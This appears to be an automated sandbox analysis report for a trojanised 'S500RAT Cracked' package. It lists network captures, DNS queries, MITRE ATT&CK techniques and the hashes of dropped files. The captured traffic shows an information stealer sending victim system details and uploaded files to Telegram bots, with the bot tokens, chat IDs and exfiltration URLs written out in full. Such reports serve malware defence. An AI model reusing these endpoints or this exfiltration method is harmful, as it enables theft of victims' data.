F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Source%20code%20files:%207%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%205%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True

S500RAT Cracked.exe

Remote address:

149.154.167.220:443

Request

GET /bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-15%208:24:32%20PM%0ASystem:%20Windows%2011%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20OZYSBZXK%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201536x864%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.31%0AExternal%20IP:%20181.215.176.83%0ABSSID:%204e:4b:8f:98:3c:ac%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Source%20code%20files:%207%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%205%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 400 Bad Request

Server: nginx/1.18.0
Date: Wed, 15 Jan 2025 20:24:50 GMT
Content-Type: application/json
Content-Length: 137
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226&text=%F0%9F%93%81%20Uploading%20Log%20Folders...

S500RAT Cracked.exe

Remote address:

149.154.167.220:443

Request

GET /bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 15 Jan 2025 20:24:51 GMT
Content-Type: application/json
Content-Length: 278
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
POST

https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendDocument?chat_id=1238600226

S500RAT Cracked.exe

Remote address:

149.154.167.220:443

Request

POST /bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendDocument?chat_id=1238600226 HTTP/1.1
Content-Type: multipart/form-data; boundary="3687e879-d40d-4fdd-a8a6-b9b9ba49cab2"
Host: api.telegram.org
Content-Length: 75990
Expect: 100-continue

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Wed, 15 Jan 2025 20:24:52 GMT
Content-Type: application/json
Content-Length: 494
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
POST

https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348

S500RAT Cracked.exe

Remote address:

149.154.167.220:443

Request

POST /bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348 HTTP/1.1
Content-Type: multipart/form-data; boundary="4a2acb06-d095-4a5d-a2dc-add32b30e0d7"
Host: api.telegram.org
Content-Length: 75990
Expect: 100-continue

Response

HTTP/1.1 401 Unauthorized

Server: nginx/1.18.0
Date: Wed, 15 Jan 2025 20:24:53 GMT
Content-Type: application/json
Content-Length: 58
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

http://ip-api.com/line/?fields=hosting

KeyGenerator.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 15 Jan 2025 20:26:37 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET

http://ip-api.com/line/?fields=hosting

SearchFilterHost.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 15 Jan 2025 20:27:05 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44

23.62.195.195:443

cxcs.microsoft.net

tls

1.5kB
7.5kB
20
16
88.221.135.43:443

www.bing.com

tls

1.9kB
5.8kB
19
14
104.16.185.241:80

http://icanhazip.com/

http

S500RAT Cracked.exe

339 B
709 B
6
4

HTTP Request

GET http://icanhazip.com/

HTTP Response

200
104.21.44.66:443

https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=4e:4b:8f:98:3c:ac

tls, http

S500RAT Cracked.exe

812 B
4.5kB
9
9

HTTP Request

GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=4e:4b:8f:98:3c:ac

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226&text=%F0%9F%93%81%20Uploading%20Log%20Folders...

tls, http

S500RAT Cracked.exe

2.7kB
7.6kB
13
14

HTTP Request

GET https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202025-01-15%208:24:32%20PM%0ASystem:%20Windows%2011%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20OZYSBZXK%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201536x864%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.0.31%0AExternal%20IP:%20181.215.176.83%0ABSSID:%204e:4b:8f:98:3c:ac%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Source%20code%20files:%207%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%205%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True

HTTP Response

400

HTTP Request

GET https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendMessage?chat_id=1238600226&text=%F0%9F%93%81%20Uploading%20Log%20Folders...

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendDocument?chat_id=1238600226

tls, http

S500RAT Cracked.exe

79.7kB
8.8kB
68
50

HTTP Request

POST https://api.telegram.org/bot7172310068:AAHciRxBKiL8yb3xQPb16MGBa7sLY1YMnC8/sendDocument?chat_id=1238600226

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348

tls, http

S500RAT Cracked.exe

79.7kB
7.8kB
68
37

HTTP Request

POST https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348

HTTP Response

401
127.0.0.1:8808

S500RAT Cracked.exe
88.221.135.43:443

www.bing.com

tls

1.9kB
5.7kB
19
13
23.62.195.195:443

cxcs.microsoft.net

tls

1.5kB
7.6kB
20
17
127.0.0.1:7707

S500RAT Cracked.exe
127.0.0.1:8808

S500RAT Cracked.exe
127.0.0.1:7707

S500RAT Cracked.exe
127.0.0.1:7707

S500RAT Cracked.exe
127.0.0.1:7707

S500RAT Cracked.exe
127.0.0.1:8808

S500RAT Cracked.exe
127.0.0.1:6606

S500RAT Cracked.exe
127.0.0.1:6606

S500RAT Cracked.exe
127.0.0.1:8808

S500RAT Cracked.exe
127.0.0.1:6606

S500RAT Cracked.exe
127.0.0.1:6606

S500RAT Cracked.exe
127.0.0.1:8808

S500RAT Cracked.exe
127.0.0.1:7707

S500RAT Cracked.exe
127.0.0.1:7707

S500RAT Cracked.exe
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

KeyGenerator.exe

310 B
267 B
5
2

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
127.0.0.1:8808

S500RAT Cracked.exe
127.0.0.1:7707

S500RAT Cracked.exe
127.0.0.1:6606

S500RAT Cracked.exe
127.0.0.1:8808

S500RAT Cracked.exe
208.95.112.1:80

http://ip-api.com/line/?fields=hosting

http

SearchFilterHost.exe

310 B
267 B
5
2

HTTP Request

GET http://ip-api.com/line/?fields=hosting

HTTP Response

200
127.0.0.1:8808

S500RAT Cracked.exe
127.0.0.1:8808

S500RAT Cracked.exe
127.0.0.1:6606

S500RAT Cracked.exe
20.26.156.215:443

github.com

tls

powershell.exe

6.2kB
213.4kB
122
156
127.0.0.1:6606

S500RAT Cracked.exe

8.8.8.8:53

cxcs.microsoft.net

dns

470 B
913 B
7
7

DNS Request

cxcs.microsoft.net

DNS Response

23.62.195.195

DNS Request

8.8.8.8.in-addr.arpa

DNS Request

ocsp.digicert.com

DNS Response

104.78.173.167

DNS Request

43.135.221.88.in-addr.arpa

DNS Request

241.185.16.104.in-addr.arpa

DNS Request

nexusrules.officeapps.live.com

DNS Response

52.111.243.30

DNS Request

ip-api.com

DNS Response

208.95.112.1
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

279 B
459 B
4
4

DNS Request

172.214.232.199.in-addr.arpa

DNS Request

api.telegram.org

DNS Response

149.154.167.220

DNS Request

30.243.111.52.in-addr.arpa

DNS Request

1.112.95.208.in-addr.arpa
8.8.8.8:53

167.173.78.104.in-addr.arpa

dns

334 B
709 B
5
5

DNS Request

167.173.78.104.in-addr.arpa

DNS Request

api.mylnikov.org

DNS Response

104.21.44.66

172.67.196.114

DNS Request

220.167.154.149.in-addr.arpa

DNS Request

ctldl.windowsupdate.com

DNS Response

199.232.210.172

199.232.214.172

DNS Request

github.com

DNS Response

20.26.156.215

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SearchFilterHost\SearchFilterHost.exe

Filesize
301KB

MD5
622aed98f14dc668ff4f7bbe9abd320f

SHA1
c07b1c7b7cbf4b65d5b7d4717cbb6405087857a3

SHA256
46d8c13876da79dc93cac213a93fbc04a6e3ebddbc23cc003acebd7941d5f1ae

SHA512
f24148f0cab6c97b00a84e047d61690558b599aa3fa26895082f49ab485ec5b9e837899908ca631fc258c4f8d4c29765a5b4e05066965239935fb2e28f4dca92

Download Submit
C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\Browsers\Firefox\Bookmarks.txt

Filesize
105B

MD5
2e9d094dda5cdc3ce6519f75943a4ff4

SHA1
5d989b4ac8b699781681fe75ed9ef98191a5096c

SHA256
c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142

SHA512
d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

Download Submit
C:\Users\Admin\AppData\Local\999b8ce92227f804f885977f66c1d44e\Admin@OZYSBZXK_en-US\System\Process.txt

Filesize
4KB

MD5
b6c66a58b122624b3480839416a68746

SHA1
e95eec37144baa0f9932e6b472502f67c9930f6d

SHA256
ceb72824d42ca94ceea7ed62ccf0124441d4357ac89bb24a2c73abda85504522

SHA512
43ed8f9bde7d9156c4bd312b7e84768391271cc0c407c3bfbc8bfafcee06c5e32824d591145aff6e7dad9c043be1ccecf45b9c4ea324ad51d9eb7192426a756a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ServerRegistrationManager.exe.log

Filesize
2KB

MD5
687d3d582eeec1983bb49f15eeec7807

SHA1
459b5f57cf96186cd6b6d5900eeaf1c5279f3580

SHA256
72a9c452f1bac167742056d73ffb1a941cb61fd4eb1ab951ba39ed9e57440332

SHA512
6560af0873d571895feb97948b286d06a04a42c9fbe45165ce4197c4899726774057e34fd1194a7095d753baa9d86c8d1d0e533c5499a88c2323d204bcfa2f5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\693.tmp\694.tmp\695.bat

Filesize
1KB

MD5
fc4af7384f0b6f274dd3e745f0aceeaa

SHA1
31b310f869b15b84e52ef282cabaee974e5043cf

SHA256
f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34

SHA512
dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_apamk11t.kd3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll

Filesize
142KB

MD5
9c43f77cb7cff27cb47ed67babe3eda5

SHA1
b0400cf68249369d21de86bd26bb84ccffd47c43

SHA256
f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e

SHA512
cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7

Download Submit
C:\Users\Admin\AppData\Local\bc66b5e94c34c933d6f9fec9453305da\msgid.dat

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3587106988-279496464-3440778474-1000\d533a5560301935f53c58c2fa4238f08_605430f4-93cf-4c59-84cd-e6cd51bd2585

Filesize
3KB

MD5
7d34759741a4a7b6807dc6800dc510b8

SHA1
450a3acba9448cab4f88ee26366a9eb3507b4e79

SHA256
a9322337dbaf20d9102ccc17cfe7a4f7d9ea49255abd4ce49debe971f989fd4d

SHA512
9b6e8fc4d6c39ba687924c5221cff6bdb1020ca74144221bce28e3bf0eb3ee10ca344e213c03836e385a6b7af49ae7787443f003dd944dc4198aa754ed357ff6

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Compression.asm

Filesize
801B

MD5
feb8d2de1663adc1e141b8f7bb95d6ac

SHA1
a9b1c4d0f522515c940a80876876d782510cb421

SHA256
ac2add960f9b626020137271676a37d6185b05c55000d2f0858f7e788e0ab37b

SHA512
af139097158c44b5feb297655dcc925fffe95acf9f2cf2248e46e3538b94a2e5f84caa01f4c1a6d0166d9fa258a2052c49e673b6ee9566ba7625f4733c6487a3

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Download.asm

Filesize
1KB

MD5
e6fad395145548f21929c4050a70d710

SHA1
97a8780b8a3d25185f83f88c5f320384b4069601

SHA256
c0a37c88fd96703c0e1f8779143bb22471d7eaea8ec05d2892feed5cd15dcf92

SHA512
857035df11651a57af93af57fc2e4728afe99016479a508fdbb7bc1f6ea1c9305e32939533aed86bdabd2a1b190b9e8b0c1d1c62b0194902e068e35d40167799

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Emulator.asm

Filesize
3KB

MD5
1efa2056cd994a29fd0d2e983ef7b26e

SHA1
76967624574c43b1e22e9b3ec4ba17139b547633

SHA256
1e832c97029620e75e6f8a053d3ec90750e7f5857803ebce82526bfa9ec39e9d

SHA512
edccae7798df98b6ed9ed3ec7fbc09acd7aeafd700704383b7e065ae2c155afc50854b21b0fd2fa20de2c0efbc674079fe9463744789b109e23ae840fa7c4ac2

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Melt.asm

Filesize
1KB

MD5
78f905ea7378410c450c79ceb3b9012b

SHA1
495f677fd305c78a77e8164f7de7d732e1aca35c

SHA256
50156675295081d268576f77201b4f78bb466446e18ca4af410833f16de7646a

SHA512
ae549f79413222a81e9b2082f3ea287ee8a34626a43bfb43c29bfb2504324620740dae465263fa280ada6450895fe856512b38b94455b058022a143e2a6583f5

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop.txt

Filesize
505B

MD5
f7bbcdd86cbc1d6d0b81720ac1477fde

SHA1
4799c37f86be4dda105ed3468934f70c36339474

SHA256
50f8cecbfc4491bb320692efbc0003b045760683bb63913fd42152dafc0c922f

SHA512
2a49ee7b7fe7b6e319455f9f9dde0906187dac60076ad83e161ef68a91319827183af0f1ae48b6e6e656419a9cb5029a29591e15083da8f113660724863445c2

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop_minimal.txt

Filesize
445B

MD5
963be96779d4ef26360c2a3af3a53816

SHA1
6991959998c9939e5ededa0d6759a715559c2140

SHA256
f639582a95112fc90e21e63757e8814f957cb597fbc18d15603e433bf551aaf4

SHA512
4525ce17036d54504143b39eb5a1a7ee1b6abe4f42ebca82c78d66d387f68f427595e73705f19ed0b61cc12c4cd473b84b3e7d87290deb8bf8a86eb904b520b0

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\register.txt

Filesize
105B

MD5
e9f329a48dcb70c6ad95c8ab8fe82eb0

SHA1
45e25355e67fd2d528467b4117884ffb601552a3

SHA256
5dd46720271713bdef9edafe9058dbee1a10003dea7cac4cb5cdb53d68a3a637

SHA512
62648e1f40ff46f54921adfd928b7cae29a9bd9778e0334b80ca593e9afbcdc287c1e7df5afa08cb44fa97cfcdd164216c4adb9566af146ac00da6fbb3e8cad4

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\PebApi.asm

Filesize
3KB

MD5
be38b0526e6d40f44c7b62d8db2c9553

SHA1
5c4c70ae1381b5e51a685f96700340832229c06d

SHA256
f1eaa5bd68ac32d37066ba1cb83d1349526df1558d7cf0767950760f442f788f

SHA512
77ba15f77a94afe24ef725a54dbefbc83894981b34fac4002e2b50bc22336d40fb371ded8db2bab3b68e76e182f552121fd443ff34211b3f96fce393e7c113ac

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stage2.asm

Filesize
1KB

MD5
e03eaf459f028cc6fa8669e277c1a17a

SHA1
ea0a775e49e279208962a9179c974969a2cf7e5e

SHA256
a32a88946334b5f32fe890fcb104b090dd38cb32ef7948f5b8382bcc2d8da61f

SHA512
17efa3673568cc44f9ef8b925bd133e1bf69851cfcbac2888db5a3a7b522c15be0d6155b4311c704355be086cfd809547628d3cb963449e4bd277fc2682d895d

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stub.asm

Filesize
2KB

MD5
a54153cd522d951f6b360c3bd3de84d0

SHA1
639dbc414f495044c2d705f39ac965212f1c8c30

SHA256
195e94c80f787fa5e24168c46fe392d2710e9c6e4b25b31ed73201c3d2bc93fa

SHA512
95e49e83a69e5480cc2eda09e9124236a5a10af2c99795825b001005d0dd0806cf203e93cdf7459101c082b198d9c1c6078d6bbf8075d33818b87f7e7e1ae5e3

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12

Filesize
4KB

MD5
c60e527a85f285ddc66c2fcf160b1be7

SHA1
abcf2b6bffea9f0f30190783f6eae2434ef7a9a8

SHA256
35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f

SHA512
77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll

Filesize
1.9MB

MD5
0f07705bd42d86d77dab085c42775244

SHA1
7e4b5c367183f4753a8d610e353c458c3def3888

SHA256
cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443

SHA512
851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

Filesize
1.1MB

MD5
87ca06f69c513f4fbbf67c5b4e366210

SHA1
7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa

SHA256
42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5

SHA512
286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt

Filesize
70B

MD5
d5b77dfb5f248f3aabc560d8300088c5

SHA1
bbf7bb5f78051a59e725920cea3d54d1e7473cea

SHA256
113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55

SHA512
180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt

Filesize
427B

MD5
531208ea558a68c95339bea9517845c3

SHA1
95865bbeb196cf007626c92cdef1524c9b16dc5a

SHA256
dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a

SHA512
46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe

Filesize
175KB

MD5
604f8eb4afe0d9a9e3fb5f7981c09145

SHA1
92d44f43b4c9fc84b99ba34c5abb3672725ecc69

SHA256
682e2204557a05cddbaddef019cbc2eda6eaa50007f20851eadb9a33c35c458d

SHA512
cf35e1559004f48ed1ffbf5b78ae19861afb8e19a9979a49294da60f0f83ef7428bd3b5d09b869c6ce556141938d0d387deb350b10c0c9ca58087d384e4d3598

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

Filesize
18.0MB

MD5
5b52658c4517684971de10a6b7a67c30

SHA1
f0820c52617ebacaf53d8b8d97f1a42c712888bd

SHA256
3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31

SHA512
ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

Filesize
16.7MB

MD5
aa2fc72b58059e5e7e9e7003ab466322

SHA1
e171576589134431baccb40d308e7dcbc776e087

SHA256
f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88

SHA512
26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll

Filesize
221KB

MD5
17cbdd9e4cb0ede2fad8c08c05fdaa84

SHA1
74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c

SHA256
d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441

SHA512
1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll

Filesize
2.2MB

MD5
af527b22b92a23c38a492c5961cf2643

SHA1
15106adfa13415287b3e9d8deba21df53cb92eda

SHA256
4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a

SHA512
543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c

Download Submit
C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll

Filesize
19KB

MD5
3aaae3cec15b86693ae9fb8e1507c872

SHA1
ed8d0a139c609eb886482718ec2ecf96cbbe8c84

SHA256
